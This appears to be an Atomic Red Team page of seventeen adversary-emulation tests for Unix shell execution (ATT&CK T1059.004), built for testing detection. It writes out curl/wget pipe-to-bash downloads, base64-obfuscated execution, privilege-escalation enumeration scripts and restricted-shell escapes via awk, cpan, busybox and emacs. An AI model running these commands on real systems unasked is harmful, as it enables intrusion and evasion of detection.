T1059.004 - Command and Scripting Interpreter: Bash
Description from ATT&CK (opens in a new tab)
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH (opens in a new tab). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.
Atomic Tests
Atomic Test #1 - Create and Execute Bash Shell Script
Creates and executes a simple sh script.
Supported Platforms: Linux, macOS
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
script_path | Script path | path | /tmp/art.sh |
host | Host to ping | string | 8.8.8.8 |
Attack Commands: Run with sh
!
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
Cleanup Commands:
rm #{script_path}
Atomic Test #2 - Command-Line Interface
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in /tmp/art-fish.txt
.
Supported Platforms: Linux, macOS
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
Attack Commands: Run with sh
!
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
Cleanup Commands:
rm /tmp/art-fish.txt
Atomic Test #3 - Harvest SUID executable files
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Supported Platforms: Linux
auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
autosuid | Path to the autosuid shell script | path | PathToAtomicsFolder/T1059.004/src/AutoSUID.sh |
autosuid_url | Path to download autosuid shell script | url | https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh (opens in a new tab) |
Attack Commands: Run with sh
!
chmod +x #{autosuid}
bash #{autosuid}
Cleanup Commands:
rm -rf #{autosuid}
Dependencies: Run with bash
!
Description: AutoSUID must exist on disk at specified location (#{autosuid})
Check Prereq Commands:
if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
curl --create-dirs #{autosuid_url} --output #{autosuid}
Atomic Test #4 - LinEnum tool execution
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Supported Platforms: Linux
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
linenum | Path to the LinEnum shell script | path | PathToAtomicsFolder/T1059.004/src/LinEnum.sh |
linenum_url | Path to download LinEnum shell script | url | https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh (opens in a new tab) |
Attack Commands: Run with sh
!
chmod +x #{linenum}
bash #{linenum}
Cleanup Commands:
rm -rf #{linenum}
Dependencies: Run with bash
!
Description: LinnEnum must exist on disk at specified location (#{linenum})
Check Prereq Commands:
if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
curl --create-dirs #{linenum_url} --output #{linenum}
Atomic Test #5 - New script file in the tmp directory
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
Supported Platforms: Linux
auto_generated_guid: 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
Attack Commands: Run with sh
!
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
Cleanup Commands:
rm $TMPFILE
unset TMPFILE
Atomic Test #6 - What shell is running
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Supported Platforms: Linux
auto_generated_guid: 7b38e5cc-47be-44f0-a425-390305c76c17
Attack Commands: Run with sh
!
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
Atomic Test #7 - What shells are available
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Supported Platforms: Linux
auto_generated_guid: bf23c7dc-1004-4949-8262-4c1d1ef87702
Attack Commands: Run with sh
!
cat /etc/shells
Atomic Test #8 - Command line scripts
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Supported Platforms: Linux
auto_generated_guid: b04ed73c-7d43-4dc8-b563-a2fc595cba1a
Attack Commands: Run with sh
!
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
Atomic Test #9 - Obfuscated command line scripts
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
Supported Platforms: Linux
auto_generated_guid: 5bec4cc8-f41e-437b-b417-33ff60acf9af
Attack Commands: Run with sh
!
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
Atomic Test #10 - Change login shell
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Supported Platforms: Linux
auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
Attack Commands: Run with bash
! Elevation Required (e.g. root or admin)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
Cleanup Commands:
[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
Dependencies: Run with bash
!
Description: chsh - change login shell, must be installed
Check Prereq Commands:
if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
Get Prereq Commands:
echo "Automated installer not implemented yet, please install chsh manually"
Atomic Test #11 - Environment variable scripts
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Supported Platforms: Linux
auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
Attack Commands: Run with sh
!
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
Cleanup Commands:
unset ART
Atomic Test #12 - Detecting pipe-to-shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
Supported Platforms: Linux
auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh (opens in a new tab) |
Attack Commands: Run with sh
!
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
Cleanup Commands:
rm /tmp/art.txt
Dependencies: Run with bash
!
Description: Check if curl is installed on the machine.
Check Prereq Commands:
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Get Prereq Commands:
which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
Atomic Test #13 - Current kernel information enumeration
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Supported Platforms: Linux
auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
Attack Commands: Run with sh
!
uname -srm
Atomic Test #14 - Shell Creation using awk command
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell (opens in a new tab)
Supported Platforms: Linux, macOS
auto_generated_guid: ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5
Attack Commands: Run with sh
!
awk 'BEGIN {system("/bin/sh &")}'
Atomic Test #15 - Creating shell using cpan command
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/ (opens in a new tab)
Supported Platforms: Linux, macOS
auto_generated_guid: bcd4c2bc-490b-4f91-bd31-3709fe75bbdf
Attack Commands: Run with sh
!
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
Atomic Test #16 - Shell Creation using busybox command
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/busybox/ (opens in a new tab)
Supported Platforms: Linux
auto_generated_guid: ab4d04af-68dc-4fee-9c16-6545265b3276
Attack Commands: Run with sh
!
busybox sh &
Atomic Test #17 - emacs spawning an interactive system shell
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/ (opens in a new tab)
Supported Platforms: Linux, macOS
auto_generated_guid: e0742e38-6efe-4dd4-ba5c-2078095b6156
Attack Commands: Run with sh
! Elevation Required (e.g. root or admin)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Dependencies: Run with bash
!
Description: Check if emacs is installed on the machine.
Check Prereq Commands:
if [ -x "$(command -v emacs)" ]; then echo "emacs is installed"; else echo "emacs is NOT installed"; exit 1; fi
Get Prereq Commands:
which apt && apt update && apt install -y emacs || which pkg && pkg update && pkg install -y emacs || which brew && brew update && brew install --quiet emacs